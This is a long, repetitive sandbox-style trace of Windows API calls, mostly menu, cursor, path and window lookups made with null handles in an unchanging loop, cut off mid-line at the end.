[0100.661] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.661] GetMenu (hWnd=0x0) returned 0x0 [0100.661] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.661] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.661] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.661] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.661] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.661] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.661] GetStockObject (i=6) returned 0x1b00018 [0100.661] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.661] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.661] PathFileExistsW (pszPath=0x0) returned 0 [0100.661] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.661] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.661] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.661] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.661] GetMenu (hWnd=0x0) returned 0x0 [0100.661] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.661] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.661] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.661] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.661] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.661] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.661] GetStockObject (i=6) returned 0x1b00018 [0100.661] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.661] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.661] PathFileExistsW (pszPath=0x0) returned 0 [0100.661] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.662] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.662] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.662] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.662] GetMenu (hWnd=0x0) returned 0x0 [0100.662] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x37a) returned -1 [0100.662] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.662] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.662] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.662] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.662] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.662] GetStockObject (i=6) returned 0x1b00018 [0100.662] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.662] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.662] PathFileExistsW (pszPath=0x0) returned 0 [0100.662] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.662] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.662] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.662] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.662] GetMenu (hWnd=0x0) returned 0x0 [0100.662] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.662] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.662] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.662] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.662] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.662] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.662] GetStockObject (i=6) returned 0x1b00018 [0100.662] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.662] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.662] PathFileExistsW (pszPath=0x0) returned 0 [0100.662] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.662] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.662] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.662] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.662] GetMenu (hWnd=0x0) returned 0x0 [0100.662] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.662] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.662] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.663] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.663] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.663] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.663] GetStockObject (i=6) returned 0x1b00018 [0100.663] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.663] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.663] PathFileExistsW (pszPath=0x0) returned 0 [0100.663] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.663] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.663] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.663] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.663] GetMenu (hWnd=0x0) returned 0x0 [0100.663] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.663] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.663] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.663] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.663] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.663] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.663] GetStockObject (i=6) returned 0x1b00018 [0100.663] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.663] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.663] PathFileExistsW (pszPath=0x0) returned 0 [0100.663] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.663] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.663] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.663] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.663] GetMenu (hWnd=0x0) returned 0x0 [0100.663] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.663] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.663] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.663] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.663] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.663] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.663] GetStockObject (i=6) returned 0x1b00018 [0100.663] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.663] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.664] PathFileExistsW (pszPath=0x0) returned 0 [0100.664] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.664] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.664] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.664] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.664] GetMenu (hWnd=0x0) returned 0x0 [0100.664] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x410) returned -1 [0100.664] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.664] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.664] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.664] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.664] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.664] GetStockObject (i=6) returned 0x1b00018 [0100.664] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.664] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.664] PathFileExistsW (pszPath=0x0) returned 0 [0100.664] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.664] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.664] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.664] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.664] GetMenu (hWnd=0x0) returned 0x0 [0100.664] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.664] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.664] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.664] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.664] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.664] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.664] GetStockObject (i=6) returned 0x1b00018 [0100.664] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.664] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.664] PathFileExistsW (pszPath=0x0) returned 0 [0100.664] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.664] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.664] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.664] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.664] GetMenu (hWnd=0x0) returned 0x0 [0100.665] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x344) returned -1 [0100.665] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.665] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.665] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.665] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.665] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.665] GetStockObject (i=6) returned 0x1b00018 [0100.665] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.665] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.665] PathFileExistsW (pszPath=0x0) returned 0 [0100.665] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.665] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.665] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.665] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.665] GetMenu (hWnd=0x0) returned 0x0 [0100.665] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.665] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.665] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.665] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.665] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.665] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.665] GetStockObject (i=6) returned 0x1b00018 [0100.665] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.665] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.665] PathFileExistsW (pszPath=0x0) returned 0 [0100.665] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.665] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.665] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.665] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.665] GetMenu (hWnd=0x0) returned 0x0 [0100.665] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.665] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.665] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.665] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.665] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.666] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.666] GetStockObject (i=6) returned 0x1b00018 [0100.666] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.666] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.666] PathFileExistsW (pszPath=0x0) returned 0 [0100.666] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.666] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.666] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.666] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.666] GetMenu (hWnd=0x0) returned 0x0 [0100.666] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x270) returned -1 [0100.666] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.666] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.666] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.666] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.666] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.666] GetStockObject (i=6) returned 0x1b00018 [0100.666] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.666] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.666] PathFileExistsW (pszPath=0x0) returned 0 [0100.666] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.666] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.666] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.666] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.666] GetMenu (hWnd=0x0) returned 0x0 [0100.666] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.666] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.666] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.666] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.666] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.666] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.666] GetStockObject (i=6) returned 0x1b00018 [0100.666] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.666] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.666] PathFileExistsW (pszPath=0x0) returned 0 [0100.666] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.666] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.667] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.667] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.667] GetMenu (hWnd=0x0) returned 0x0 [0100.667] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x343) returned -1 [0100.667] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.667] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.667] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.667] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.667] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.667] GetStockObject (i=6) returned 0x1b00018 [0100.667] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.667] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.667] PathFileExistsW (pszPath=0x0) returned 0 [0100.667] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.667] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.667] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.667] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.667] GetMenu (hWnd=0x0) returned 0x0 [0100.667] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.667] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.667] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.667] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.667] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.667] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.667] GetStockObject (i=6) returned 0x1b00018 [0100.667] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.667] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.667] PathFileExistsW (pszPath=0x0) returned 0 [0100.667] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.667] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.667] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.667] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.667] GetMenu (hWnd=0x0) returned 0x0 [0100.667] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.667] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.667] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.668] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.668] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.668] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.668] GetStockObject (i=6) returned 0x1b00018 [0100.668] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.668] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.668] PathFileExistsW (pszPath=0x0) returned 0 [0100.668] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.668] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.668] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.668] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.668] GetMenu (hWnd=0x0) returned 0x0 [0100.668] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1ec) returned -1 [0100.668] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.668] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.668] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.668] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.668] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.668] GetStockObject (i=6) returned 0x1b00018 [0100.668] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.668] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.668] PathFileExistsW (pszPath=0x0) returned 0 [0100.668] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.668] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.668] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.668] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.668] GetMenu (hWnd=0x0) returned 0x0 [0100.668] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.668] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.668] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.668] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.668] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.668] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.668] GetStockObject (i=6) returned 0x1b00018 [0100.668] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.669] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.669] PathFileExistsW (pszPath=0x0) returned 0 [0100.669] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.669] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.669] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.669] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.669] GetMenu (hWnd=0x0) returned 0x0 [0100.669] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x344) returned -1 [0100.669] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.669] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.669] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.669] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.669] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.669] GetStockObject (i=6) returned 0x1b00018 [0100.669] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.669] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.669] PathFileExistsW (pszPath=0x0) returned 0 [0100.669] GetWindowsDirectoryA (in: 